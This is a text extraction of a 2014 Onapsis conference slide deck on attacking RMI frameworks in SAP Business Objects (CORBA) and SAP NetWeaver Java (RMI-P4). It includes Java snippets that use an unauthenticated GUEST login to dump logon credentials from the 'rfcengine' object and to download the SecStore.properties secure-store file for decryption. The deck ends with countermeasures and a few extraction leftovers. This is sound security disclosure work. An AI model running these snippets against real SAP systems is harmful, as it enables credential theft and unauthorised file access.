dissecting and attacking rmi frameworks

CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved03/12/2014

1

Title goes hereNahuel D. Sánchez Sergio [email protected] [email protected]

@serj_ab

Dissecting and Attacking RMI Frameworks

mailto:[email protected]


CONFIDENTIAL© 2014 Onapsis, Inc. All Rights Reserved

This presentation contains references to the products of SAP AG. SAP, R/3, xApps, xApp, SAP NetWeaver,

Duet, PartnerEdge, ByDesign, SAP Business ByDesign, and other SAP products and services mentioned

herein are trademarks or registered trademarks of SAP AG in Germany and in several other countries all

over the world.

Business Objects and the Business Objects logo, BusinessObjects, Crystal Reports, Crystal Decisions, Web

Intelligence, Xcelsius and other Business Objects products and services mentioned herein are trademarks

or registered trademarks of Business Objects in the United States and/or other countries.

SAP AG is neither the author nor the publisher of this publication and is not responsible for its content,

and SAP Group shall not be liable for errors or omissions with respect to the materials.

Disclaimer


Onapsis Inc. Overview

Transforming how organizations protect the applications that manage their business-critical processes and information.

Founded: 2009

Locations: Buenos Aires, AR | Boston, MA | Berlin, DE | Lyon, FR

Technology: Onapsis X1 (Auditor Solution)

Onapsis Security Platform (Enterprise Solution)

(PCT patent-pending)

Pricing: Subscription-based (Enterprise, Audit On-Demand and MSP)

Research: 130+ SAP security advisories and presentations published


Who are We?

Sergio: SAP Security Specialist

Nahuel: Security Researcher

• Reported more than 25 vulnerabilities in different SAP Products

• Onapsis Blog contributors

• Authors of Onapsis SAP Security In-Depth Publications

• Speakers/Trainers at Ekoparty, Hubcon, SANS


Introduction• What is RMI?

• RMI Implementations

• RMI vs Web Services

CORBA implementation• Basic concepts (IDL’s, IOR’s)

• CORBA and SAP Business Objects

• Attacks

P4 implementation• Basic Concepts

• P4 and SAP NetWeaver

Conclusions

Agenda


RMI stands for Remote Method Invocation

Conceptually similar to RPC (Remote Procedure Call)

Allows the invocation of clients running on remote machines

Introduction | What is RMI?


Introduction | What is RMI? Cont’d


Same Idea, different implementation

Both allow users to execute actions in the server

RMI• 15-20 years old• Complex (objects management, garbage collection)• Provide interfaces for legacy systems • Stateful• A more profitable attack target

Web Services

• 15-20 years old

• Stateless

• Aware of RMI limitations/problems when developed

RMI vs Web Services


Products using RMI-based protocols

• Jboss Application Server (Java-RMI)

• Oracle Weblogic Server (Weblogic-RMI)

• IBM Lotus Domino (Java-RMI)

• Apache Axis2 (CORBA)

In this talk

• SAP Business Objects (CORBA)

• SAP Netweaver Java (RMI-P4)

Introduction | What is RMI? Cont’d


So…What is SAP?

SAP (Systems, Applications and Products in Data Processing) is a German

company devoted to the development of business solutions.

Founded in 1972.

Almost 67,000 employees.*

More than 253,000 customers.*

Presence in most countries

Third biggest independent software vendor (ISV).

• http://www.sap.com/corporate-en/about/our-company/index.html• http://en.wikipedia.org/wiki/SAP_SE


SAP Solutions

Enterprise Solutions

SAP CRM (Customer Relationship Management).

SAP ERP (Enterprise Resource Planning).

SAP SCM (Supply Chain Management).

SAP SRM (Supplier Relationship Management).

Business Solutions

SAP GRC (Government, Risk and Compliance).

SAP Portal

SAP Solution Manager

SAP Business Objects


CORBA implementation

Common Object Request Broker Architecture

Connect different software components (local/remote)

Language agnostic

Object oriented

Provides “Objectization” to non-object languages like C or COBOL

http://pubs.opengroup.org-onlinepubs-9279299-apdxa.htm


Common Object Request Broker Architecture

http://www.cs.wustl.edu/schmidt-corba-overview.html


CORBA – Locating objects

CORBA Naming Service

• Implemented as an “Object Service”

• Provides a way to locate other objects

CorbaLoc & CorbaName URLs

• Similar to “common” URLs

corbaloc:: target:1234/MyObjectKey

corbaname::target:1234/NameService#Hello/World


CORBA – Locating objects

IOR:010000003500000049444c3a696d672e73656167617465736f6674776172652e636f6d2f

_IIOP_ParseCDR: byte order LittleEndian, repository id<IDL:img.seagatesoftware.com/ImplServ/OSCAFactory:3.1>, 1 profile_IIOP_ParseCDR: profile 1 is 70 bytes, tag 0 (INTERNET), LittleEndian byte order(iiop.c:parse_IIOP_Profile): bo=LittleEndian, version=1.1, hostname=BO4WV,port=1056, object_key=<....`hjR........>object key is <#00#00#00#00`hjR#88#C5#0C#00#02#00#00#00>;no trustworthy most-specific-type info; unrecognized ORB type;reachable with IIOP 1.1 at host "BO4WV", port 1056

Interoperable Object References (IOR)

• Object key

• IP Address

• Listening port

• Repository ID

Parsed IOR:


CORBA – IDLs

Interface Definition Language (IDLs)

• Define objects

• Shared by the client and the server

• Language specific compilation

Example IDL interface

//fortune.idl

Module Fortune {

interface CookieServer {

string get_cookie();

};

};


CORBA & SAP Business Objects

Used to inter-process communications only

SAP doesn’t provide IDLs for objects

Options we have:

• Reverse engineering IDLs from classes (PITA)

Import JAVA Jar files and use it directly

Files required:

• corbaidl.jar

• ebus405.jar


CORBA & SAP Business Objects

The BOE Central Management Server (CMS)

• Platform’s brain

• Keeps track of all enabled services/servers

Name server port

• Port TCP 6400 (default)

• Applications use this port for first contact

Request port

• Dynamic port by default

• Used by all applications after first request


What we need to attack in a BO implementation?

CMS IP

CMS Static Port

CMS IOR

SRV’s IORs


Obtaining the CMS IOR

Obtained through traffic analysis

Client sends string “aps” to CMS static port (6400)

CMS returns its IOR

Needed to further attacks


DEMO #1


DEMO #2


RMI-P4

SAP proprietary protocol

Present in every SAP Netweaver Application Server Java

Combines features of Java RMI and CORBA

Listens on port: 5XX04, (5XX06 for SSL)

Can be tunneled through HTTP!!! P4HTTP (5XX05)

Enables client-server communication:

• Locating remote objects

• Communication with remote objects

• Loading classes remotely

Examples:

• SAP Enterprise Portal

• SAP Solution Manager

https://help.sap.com/saphelp_nwce711/helpdata/en/48/295738a14558d8e10000000a421937/content.htm


RMI-P4

Where is specifically RMI-P4 used?

• Real example: JMX (Java Management Extensions)

o Allows building manageable distributed Java Apps

start/stop/restart

changing configuration

backup/import settings/so on…

client-server architecture based on: RMI-P4

In fact... SAP Netweaver Application Server Java is based on a JMX Architecture

http://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=73160


RMI-P4

Basic implementation

• Server-side:

public interface HelloWorld extends java.rmi.Remote {public void hello();

}

public class HelloWorldImpl implements HelloWorld {public void Hello() {

System.out.println(“Hello World”);}

}

• Server and Client-side:

RMI-P4 does not use IDLs (as CORBA).

Interfaces are already known by the client since they are defined in both sides.


RMI-P4

How to find and invoke a remote object?

JNDI (Java Native Directory Interface)

Standard Java API

Allows applications to access multiple naming and directory services via a common

interface

Two very interesting features:

Naming Service

Directory Service

https://help.sap.com/saphelp_nwce711/helpdata/en/99/e8b84172133131e10000000a155106/content.htm


Let’s mix the ingredients


public class BankClient {

Properties p = new Properties();

// Specify the type of the InitialContext factory.

p.put(Context.INITIAL_CONTEXT_FACTORY,

"com.sap.engine.services.jndi.InitialContextFactoryImpl");

p.put(Context.PROVIDER_URL, “p4://” args[0] + ":" + args[1]); //Specify the

URL.

p.put(Context.SECURITY_PRINCIPAL, args[2]); //Specify the user.

p.put(Context.SECURITY_CREDENTIALS, args[3]);//Specify the password.

Context initialContext = new InitialContext(p); // Connect to the server by

the InitialContext.

Account account = (Account) initialContext.lookup("Bank");

// Invoke methods remotely.

account.deposit(100);

System.out.println("Balance:" + account.getBalance());

System.out.println("Try to draw...");

account.draw(50);

System.out.println("Balance:" + account.getBalance());

} catch (Exception ex) {

ex.printStackTrace();

}}

}

RMI-P4


RMI-P4

What happens if we do not specify this?

The user is logged as GUEST and.. as every application defines its own security

requirements… It only takes one missing authorization check in order to get full access!

https://help.sap.com/saphelp_nw73ehp1/helpdata/en/e9/88435b5d84b24e8c62048ff36bd600/content.htmhttp://help.sap-ag.de/saphelp_nw73/helpdata/de/4a/eac9a0cd2823aee10000000a42189c/frameset.htm

p.put(Context.SECURITY_PRINCIPAL, args[2]); //Specify the user.

p.put(Context.SECURITY_CREDENTIALS, args[3]);//Specify the password.


RMI-P4

Attack 1: Authentication Credentials Disclosure

Example of application of this attack: System Landscape Directory

• Central information repository

• Consolidates all systems, hardware and software components• Allows administration of systems

o Installationo Updates and patcheso Interfaces

• Mandatory in every SAP implementation

http://help.sap.com/saphelp_nw70/helpdata/en/21/84570b3ae14e77b3047c82218974b9/content.htm


DEMOAuthentication Credentials disclosure





p.put(Context.PROVIDER_URL, "p4://" + host + ":" + port);

Context initialContext = new InitialContext(p);

RFCRuntimeInterface_Stub o =

(RFCRuntimeInterface_Stub)initialContext.lookup("rfcengine");

BundleConfiguration[] bc = o.getConfigurations();

for (int i = 0; i < bc.length; i++) {

String data =

bc[i].getLogonClient()+":”+bc[i].getLogonUser()+":"+bc[i].getLogonPassword();

System.out.println(data);

Attack 1: Authentication Credentials Disclosure

RMI-P4


RMI-P4

Attack 2: Anonymous Remote File Read/Write

Targeted service: File Transfer Service API• SAP Ready-to-Use Service• Allows upload/download of files to/from the AppServer• Most common use case: deploy of java applications• Main problem: Lack of authorization checks.

o Consequence: Accessible by GUEST user!

http://help.sap.com/saphelp_oil472/helpdata/en/48/1d813ecfd43546e10000000a114084/content.htm

One more step…Get Secure Store:

• Secure Store container (SecStore.properties)• Secure Store key (SecStore.key)• Decrypt! (3DES)


DEMOAnonymous remote file read/write







FileTransfer_Stub o = (FileTransfer_Stub) initialContext.lookup("file");

String source = “C:\tmp\SecStore.properties”

String dest = “/usr/sap/<SID>/SYS/global/security/data/SecStore.properties”

com.sap.engine.services.file.RemoteFile f = o.createRemoteFile(source, dest);

f.download();

RMI-P4








FileTransfer_Stub o = (FileTransfer_Stub) initialContext.lookup("file");

String source = “C:\tmp\SecStore.properties”

String dest = “/usr/sap/<SID>/SYS/global/security/data/SecStore.properties”

com.sap.engine.services.file.RemoteFile f = o.createRemoteFile(source, dest);

f.download();

RMI-P4


Protection / Countermeasure

Secure P4 service (5XX04, 5XX05, 5XX06)

Apply all SAP Security Notes. Keep the systems up-to-date.

Implement SAP Security Notes 1682613 and 1819822.

Check the “References” slide for more information!


Bullet 1• Bullet 2

o Bullet 3

Conclusions

dissecting and attacking rmi frameworks

Technology

rights reserved rmi

server rmi

sap business bydesign

sap group

rmi frameworksconfidential

products of sap ag

sap security advisories

business objects products